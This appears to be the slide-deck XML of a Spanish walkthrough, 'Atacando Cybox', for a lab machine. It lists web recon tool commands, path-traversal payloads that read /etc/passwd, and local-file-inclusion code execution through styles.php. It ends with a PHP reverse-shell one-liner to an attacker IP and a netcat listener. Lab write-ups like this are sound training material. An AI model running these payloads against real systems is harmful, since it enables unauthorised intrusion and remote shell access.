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031900d8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031900d8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031900d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031900d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2e44ce0e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2e44ce0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2e44ce0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2e44ce0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2e44ce0e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2e44ce0e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Atacando Cybox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José Antonio Yáñez Jiménez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Descubriendo la web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Dir Buster (dirb)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nikto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ZAP Proxy (zaproxy)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uniscan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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="3400"/>
              <a:t>gobuster</a:t>
            </a:r>
            <a:endParaRPr sz="3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2000" y="2373975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0200" y="771550"/>
            <a:ext cx="1560550" cy="15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0113" y="2139075"/>
            <a:ext cx="7715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Agregar dominio al equipo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85850" y="1152475"/>
            <a:ext cx="894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vim /etc/hosts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</a:rPr>
              <a:t>nano /etc/hosts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Comandos para descubrir sitio web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85850" y="1152475"/>
            <a:ext cx="894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nikto -h http://cybox.company -Tuning x -o report-nikto.html -Format htm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dirb http://cybox.company directory-list-1.0.txt -w -o dirb-output.txt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sudo uniscan -u http://cybox.company -qwedsrgj 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zaproxy -cmd -quickurl http://cybox.company -quickprogress -quickout zap-report.xml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</a:rPr>
              <a:t>gobuster -u cybox.company -w ./subdomains-top1mil-110000.txt -o subdomains.txt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Explorar el servidor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85850" y="1152475"/>
            <a:ext cx="8949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monitor.cybox.company/admin/styles.php?style=../../../../../../etc/passwd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monitor.cybox.company/admin/styles.php?style=../../../../../../etc/passwd%00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Reverse shell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85850" y="1152475"/>
            <a:ext cx="8949300" cy="38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python2 &lt;script&gt; &lt;host&gt; &lt;puerto&gt; &lt;hilos&gt;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nc -lvp &lt;puerto&gt;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monitor.cybox.company/admin/styles.php?f=id&amp;style=../../../../../../tmp/g%00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https://ironhackers.es/herramientas/reverse-shell-cheat-sheet/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php -r '$sock=fsockopen("&lt;ip&gt;",&lt;puerto&gt;);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'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http://monitor.cybox.company/admin/styles.php?f=php -r '$sock=fsockopen("&lt;ip&gt;",&lt;puerto&gt;);exec("/bin/sh -i &lt;%263 &gt;%263 2&gt;%263");'&amp;style=../../../../../../tmp/g%00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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://ironhackers.es/tutoriales/como-conseguir-tty-totalmente-interactiva/</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>python -c 'import pty; pty.spawn("/bin/bash")'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